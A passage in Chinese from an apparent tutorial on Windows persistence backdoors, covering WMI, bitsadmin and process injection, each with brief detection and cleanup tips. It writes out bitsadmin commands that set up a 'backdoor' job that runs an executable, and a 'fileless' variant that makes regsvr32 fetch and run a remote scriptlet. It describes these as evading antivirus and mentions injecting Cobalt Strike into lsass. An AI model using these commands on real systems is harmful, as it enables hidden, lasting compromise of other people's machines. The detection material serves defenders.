缺点:目前杀软对powershell这类监管较严格,容易被发现
检测及清除:
从WMI数据库中删除条目的最简单方法,就是使用Autoruns。为此,我们不妨以管理员身份启动Autoruns,并选择WMI选项卡,这样就可以查找与WMI相关的持久性后门了。
2.8.2Bitsadmin(windows 自带用于创建上传或下载任务)
bitsadmin.exe是windows自带的可用于创建下载或上载作业并监视其进度,bistadmin可以指定下载成功之后要进行什么命令。
Bistadmin可以指定下载成功之后要进行什么命令。后门就是利用的下载成功之后进行命令执行。可绕过autorun、常见杀软检测。
如果任务未完成,支持在重新启动计算机或重新建立网络连接之后自动恢复文件传输。
bitsadmin /create backdoor # 创建任务 bitsadmin /addfile backdoor %comspec% %temp%cmd.exe 给任务test添加一个下载文件 bitsadmin.exe /SetNotifyCmdLine backdoor "%COMSPEC%" "cmd.exe /c start /B C:a.exe" //设置在任务完成传输时或任务进入状态时将运行的命令行命令 bitsadmin /Resume backdoor # 激活执行任务
无文件不落地后门
bitsadmin /create backdoor bitsadmin /addfile backdoor %comspec% %temp%cmd.exe bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i::80/aa scrobj.dll" bitsadmin /Resume backdoor重启计算机:
重启计算机,发现弹出对话框,BITS 任务依然存在,如果我们想让任务完成,可以执行bitsadmin /complete test
检测及查杀:
使用bitsadmin列出所有任务
bitsadmin /list /allusers /verbose
2.9进程注入准确来说进程注入不是后门技术或者权限维持技术,而是一种隐藏技术,以cobaltstrike为例,一般可以注入到像是lsass或者explorer这样的进程当中,相对比较隐蔽,较难排查
进程注入排查:
使用工具process explorer 、process monitor等均可
三、Linux后门 3.1crontab计划任务后门